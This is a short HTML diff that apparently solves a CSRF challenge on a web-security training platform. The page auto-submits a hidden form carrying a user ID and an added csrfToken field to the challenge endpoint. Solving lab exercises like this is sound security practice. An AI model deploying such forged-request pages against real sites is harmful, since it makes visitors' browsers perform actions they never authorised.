--- a/index.html
+++ b/index.html
@@ -3,9 +3,11 @@
 <body>
 <form action="https://shepherd.websec.dedyn.io/user/csrfchallengetwo/plusplus" method="POST" name="csrf">
 <input type="hidden" name="userId" value="398a2626d934ee0e28e46e4c5d5c1cab10e1a9b8"/>
+<input type="hidden" name="csrfToken" value="172710766611610157820635980197234376"/>
 </form>
 <script>document.csrf.submit()</script>
 </body>
 </html>
+
 
 
